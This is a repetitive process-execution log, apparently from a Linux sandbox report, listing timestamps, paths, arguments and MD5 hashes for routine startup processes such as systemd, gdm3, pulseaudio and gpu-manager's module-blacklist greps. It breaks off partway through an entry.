                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/pulseaudio
                                                    Arguments:/usr/bin/pulseaudio --daemonize=no --log-target=journal
                                                    File size:100832 bytes
                                                    MD5 hash:0c3b4c789d8ffb12b25507f27e14c186

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/sbin/gdm3
                                                    Arguments:-
                                                    File size:453296 bytes
                                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/etc/gdm3/PrimeOff/Default
                                                    Arguments:/etc/gdm3/PrimeOff/Default
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/sbin/gdm3
                                                    Arguments:-
                                                    File size:453296 bytes
                                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/etc/gdm3/PrimeOff/Default
                                                    Arguments:/etc/gdm3/PrimeOff/Default
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/sbin/gdm3
                                                    Arguments:-
                                                    File size:453296 bytes
                                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                    Start time (UTC):18:48:30
                                                    Start date (UTC):02/04/2025
                                                    Path:/etc/gdm3/PrimeOff/Default
                                                    Arguments:/etc/gdm3/PrimeOff/Default
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:31
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:31
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:48:31
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:48:31
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:31
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:31
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/grep
                                                    Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                                    File size:199136 bytes
                                                    MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/grep
                                                    Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                                    File size:199136 bytes
                                                    MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/grep
                                                    Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                                    File size:199136 bytes
                                                    MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/grep
                                                    Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                                    File size:199136 bytes
                                                    MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/grep
                                                    Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                                    File size:199136 bytes
                                                    MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/grep
                                                    Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                                    File size:199136 bytes
                                                    MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                    Start time (UTC):18:48:33
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:48:33
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:33
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:33
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/grep
                                                    Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                                    File size:199136 bytes
                                                    MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                    Start time (UTC):18:48:33
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:48:33
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:33
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:33
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/grep
                                                    Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                                    File size:199136 bytes
                                                    MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:32
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:33
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:33
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:34
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:34
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/share/gdm/generate-config
                                                    Arguments:/usr/share/gdm/generate-config
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:34
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/share/gdm/generate-config
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):18:48:34
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/pkill
                                                    Arguments:pkill --signal HUP --uid gdm dconf-service
                                                    File size:30968 bytes
                                                    MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                    Start time (UTC):18:48:37
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:37
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/gdm3/gdm-wait-for-drm
                                                    Arguments:/usr/lib/gdm3/gdm-wait-for-drm
                                                    File size:14640 bytes
                                                    MD5 hash:82043ba752c6930b4e6aaea2f7747545

                                                    Start time (UTC):18:48:47
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:47
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/sbin/gdm3
                                                    Arguments:/usr/sbin/gdm3
                                                    File size:453296 bytes
                                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                    Start time (UTC):18:48:48
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:48
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:48
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:48
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:48:48
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:03
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/libexec/gvfsd-fuse
                                                    Arguments:-
                                                    File size:47632 bytes
                                                    MD5 hash:d18fbf1cbf8eb57b17fac48b7b4be933

                                                    Start time (UTC):18:49:03
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/fusermount
                                                    Arguments:fusermount -u -q -z -- /run/user/1000/gvfs
                                                    File size:39144 bytes
                                                    MD5 hash:576a1b135c82bdcbc97a91acea900566

                                                    Start time (UTC):18:49:35
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:35
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:36
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:36
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:36
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:37
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:37
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:37
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:37
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:37
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:37
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:37
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:37
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:37
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:37
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:38
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:39
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:39
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:39
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:39
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:39
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:39
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:39
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:39
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:39
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:39
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:39
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:40
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:40
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:40
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:40
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:40
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:40
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:40
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:40
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:41
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:41
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:41
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:42
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Start time (UTC):18:49:42
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:42
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:42
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Start time (UTC):18:49:42
                                                    Start date (UTC):02/04/2025
